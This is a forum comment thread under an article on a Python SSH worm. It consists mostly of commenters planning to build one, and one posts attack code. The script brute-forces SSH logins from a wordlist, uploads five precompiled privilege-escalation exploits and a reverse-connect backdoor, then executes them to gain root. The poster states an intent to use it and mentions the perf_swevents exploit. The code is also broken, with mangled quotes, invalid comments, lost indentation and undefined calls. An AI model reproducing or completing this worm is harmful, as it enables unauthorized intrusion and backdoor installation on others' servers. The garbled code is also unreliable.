It is a python or a worm? Joke! :)
Interesting article!

Nice article :D does it get detected by AV?

I don’t know I haven’t tried it yet, and the guy doesn’t give away the whole code. When I’ll have some time, I’ll try to figure out what’s missing.

jeez thats fucking easy holy shit bro for sure i am going to use this all he is doing is cracking the ssh server like hydra etc than once he has a valid username /password he uploads the exploit and executes than exploits damn we need to work on this pray tell how to you do the base 64 encoding of an exe into python lol you can precompile a exploit and have it stored inside the program and transferred via that method

Thanks for sharing!

um i have this worked out a lil what i have done is i plan to use perf_swevents exploit to upload to the target server after i break into ssh than i may do a few other thingsim going to try this on kali in about an hour when im done i will screen record it if i get it to compile right

ah cool, please let me know :)

ok now i have never messed with python before but here is my attempt and the backdoor is precompiled linux binary

```#!/usr/bin/env python

“”“
Author: Vivek Ramachandran
Website: http://SecurityTube.net
Online Infosec Training: http://SecurityTube-Training.com
and a stab at it from oxide
”“”

import paramiko
import sys

// input variables via command line
def AttackSSH(ipAddress, dictionaryFile) :

print “[+] Attacking Host : %s ” %ipAddress

ssh = paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

for line in open(dictionaryFile, “r”).readlines() :

[username, password] = line.strip().split()

try :
print “[+] Trying to break in with username: %s password: %s ” % (username, password)
ssh.connect(ipAddress, username=username, password=password)

except paramiko.AuthenticationException:
print “[-] Failed please keep trying or use a bigger dictionary! …”
continue

print “[+] Success … username: %s and passoword %s is VALID! ” % (username, password)
//upload_and_execute( ipAddress,username,password)
break

def UploadFileAndExecute(ipAddress,username,password) :
#exploit path
path = “/tmp/oxide/pythonworm/exploit/”
#very small and fud compiled linux binary and windows backdoor reverse connect
backdoor= “/tmp/oxide/pythonworm/exploit/backdoor”
#5 exploits will be precompiled on attack server to send over ssh upon breakin
exploit1 = “ /home/oxide/pythonworm/exploit/exploit_1”
exploit2 = “ /home/oxide/pythonworm/exploit/exploit_2”
exploit3 = “ /home/oxide/pythonworm/exploit/exploit_3”
exploit4 = “ /home/oxide/pythonworm/exploit/exploit_4”
exploit5 = “ /home/oxide/pythonworm/exploit/exploit_5”

#sftp ssh client for uploading
sftpClient = sftp.Server(ipAddress,username,password)

#putting all 5 exploit on target server
sftpClient.upload(exploit1,+path)
sftpClient.upload(exploit2,+path)
sftpClient.upload(exploit3,+path)
sftpClient.upload(exploit4,+path)
sftpClient.upload(exploit5,+path)

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ipAddress, username, password)

we need to create the remote directory

ssh.exec_command(“mkdir ”+path)
ssh.exec_command(“chmod a+x” +path)

#now run all 5 and give full rights
ssh.exec_command(“chmod a+x” +path +exploit1)
ssh.exec_command(“nohup” +path +exploit1+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit2)
ssh.exec_command(“nohup” +path +exploit2+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit3)
ssh.exec_command(“nohup” +path +exploit3+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit4)
ssh.exec_command(“nohup” +path +exploit4+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit5)
ssh.exec_command(“nohup” +path +exploit5+ “ &”)

close our file sender

sftpClient.close()
ssh.close()

now if all worked we should have an exploited machine and backconnect trojan installed wit hroot rights

if name == “main” :
AttackSSH(sys.argv[1], sys.argv[2])```

now in my head if we precompile the backdoor and exploits and have a proper wordlist this should work now we have to figure out how he scans for ssh lol than we should be 75% to what he did

if this looks like i have sytax right etc let me know and ill get the rest to start working via precompiled exploits etc and ill set up my own ssh server etc let me know what you guys think

1 -Having not read it just gave a look we need to indent that code.
2 -My big trouble with this code is that I don’t have paramiko, I’m trying to get it

of course it uses parmiko all we have to do is include it and compile it on the attacking end
and embed what we need in these xploits etc in case i got this right or was close i didnt want to release because i want to use pef_swevents which is recent

sorry i apparentl;y suck at python im fixing the code or trying to